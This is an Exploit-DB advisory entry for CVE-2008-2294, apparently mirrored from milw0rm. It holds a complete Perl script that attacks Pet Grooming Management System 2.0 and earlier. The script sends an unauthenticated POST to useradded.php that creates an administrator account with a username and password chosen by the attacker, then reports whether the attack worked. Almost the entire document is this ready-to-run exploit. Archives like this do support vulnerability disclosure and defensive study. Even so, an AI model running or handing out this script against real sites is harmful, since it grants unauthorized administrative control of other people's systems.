Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit

2008-05-15T00:00:00
ID EDB-ID:5627
Type exploitdb
Reporter t0pP8uZz
Modified 2008-05-15T00:00:00

Description

Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit. CVE-2008-2294. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "-+- Pet Grooming Management System &lt;= 2.0 Arbitrary Add-Admin Exploit -+-\n";
print "-+-  Discovered && Coded By: t0pP8uZz  -  Discovered On: 15 MAY 2008  -+-\n";
print "-+-  Script Download: http://sourceforge.net/projects/petgroom/       -+-\n";
print "-+- Pet Grooming Management System &lt;= 2.0 Arbitrary Add-Admin Exploit -+-\n";

print "\nEnter URL(http://site.com/pet/): ";
	chomp(my $url=&lt;STDIN&gt;);
	
print "\nEnter Username(create your admin username): ";
	chomp(my $user=&lt;STDIN&gt;);
	
print "\nEnter Password(create your admin password): ";
	chomp(my $pass=&lt;STDIN&gt;);

my $ua = LWP::UserAgent-&gt;new( agent =&gt; 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
my $ob = $ua-&gt;post($url."/useradded.php", { "name" =&gt; "admin", "user" =&gt; $user, "pwd" =&gt; $pass, "level" =&gt; 1, "centerstatus" =&gt; "a" } );

if($ob-&gt;is_success && index($ob-&gt;content, 10) != -1) {
	print "\n\nUser Added Successfully! Login to: $url\n";
} else { print "\n\nUser was not added. Username may be in use, or site isnt running PGMS.\n"; }

# milw0rm.com [2008-05-15]